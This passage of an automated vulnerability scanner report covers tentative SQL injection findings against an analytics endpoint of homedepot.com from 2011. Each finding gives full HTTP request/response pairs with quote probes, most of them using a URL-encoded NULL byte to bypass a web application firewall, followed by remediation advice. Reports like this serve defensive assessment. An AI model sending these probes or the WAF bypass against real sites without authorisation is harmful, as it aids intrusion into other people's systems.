s_pers=%20s_scOpen%3D1%7C1308225937406%3B%20s_campaign%3Dno%2520value%7C1308225937412%3B%20s_prevPage%3Dno%2520value%7C1308225937418%3B%20p_30%3Dno%2520value%7C1308225937424%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:47:29 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.46. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s14691738680163 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s14691738680163

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/homedepot/1/H.22.1/s14691738680163?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A41%3A48%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:49:58 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/homedepot/1/H.22.1/s14691738680163?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A41%3A48%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:49:58 GMT
Server: Omniture DC/2.0.0
xserver: www438
Content-Length: 0
Content-Type: text/html


1.47. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15323097258507 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15323097258507

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1%00'/H.22.1/s15323097258507?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A43%3A0%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:53:24 GMT
Server: Omniture DC/2.0.0
Content-Length: 412
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1 was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1%00''/H.22.1/s15323097258507?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A43%3A0%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&ch=errorPage&pageType=errorPage&events=event10&v4=direct&c27=Oops!%20The%20page%20you%20have%20requested%20cannot%20be%20found.&c28=Navigation&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:53:24 GMT
Server: Omniture DC/2.0.0
xserver: www320
Content-Length: 0
Content-Type: text/html


1.48. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15357372987793 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15357372987793

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot%00'/1/H.22.1/s15357372987793?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A30%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:24:13 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot%00''/1/H.22.1/s15357372987793?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A30%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:24:13 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.49. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15506593697366 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15506593697366

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/homedepot/1/H.22.1/s15506593697366?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A33%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:35:55 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/homedepot/1/H.22.1/s15506593697366?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A33%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=about%3Ablank&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:35:55 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.50. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15620280432453 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s15620280432453

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/homedepot/1/H.22.1/s15620280432453?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A52%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:23:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 436
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s15620280432453 was not fou
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s15620280432453?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A55%3A52%204%20300&ce=UTF-8&ns=homedepot&g=about%3Ablank&cc=USD&c16=Refinements%7CProducts%7CIn%20Store&c35=undefined&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_o&pev2=Refinements&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:23:41 GMT
Server: Omniture DC/2.0.0
xserver: www440
Content-Length: 0
Content-Type: text/html


1.51. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s1593516894569

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/homedepot/1/H.22.1/s1593516894569?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:04 GMT
Server: Omniture DC/2.0.0
Content-Length: 435
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/homedepot/1/H.22.1/s1593516894569 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/homedepot/1/H.22.1/s1593516894569?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:05 GMT
Server: Omniture DC/2.0.0
xserver: www440
Content-Length: 0
Content-Type: text/html


1.52. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s1593516894569 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s1593516894569

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1/s1593516894569%00'?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:56 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1/s1593516894569 was not found
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1/s1593516894569%00''?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A58%3A42%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 12:36:56 GMT
Server: Omniture DC/2.0.0
xserver: www369
Content-Length: 0
Content-Type: text/html


1.53. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16203244941575 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s16203244941575

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/homedepot/1/H.22.1%00'/s16203244941575?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A40%3A58%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:50:32 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/homedepot/1/H.22.1 was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/homedepot/1/H.22.1%00''/s16203244941575?AQB=1&ndh=1&t=16%2F5%2F2011%206%3A40%3A58%204%20300&ce=UTF-8&ns=homedepot&pageName=mostpopular&g=about%3Ablank&cc=USD&s=1920x1200&c=32&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx&pid=mostpopular&pidt=1&oid=Flyout-http%3A%2F%2Fwww.homedepotgardenclub.com%2FHome.aspx%3F&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wasc.homedepot.com
Cookie: s_vi=[CS]v1|26FCF56B051D3BA1-60000102200313B4[CE]; 40M3=CT-2

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 16 Jun 2011 11:50:32 GMT
Server: Omniture DC/2.0.0
xserver: www276
Content-Length: 0
Content-Type: text/html


1.54. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s16457054631772 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wasc.homedepot.com
Path:   /b/ss/homedepot/1/H.22.1/s16457054631772

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

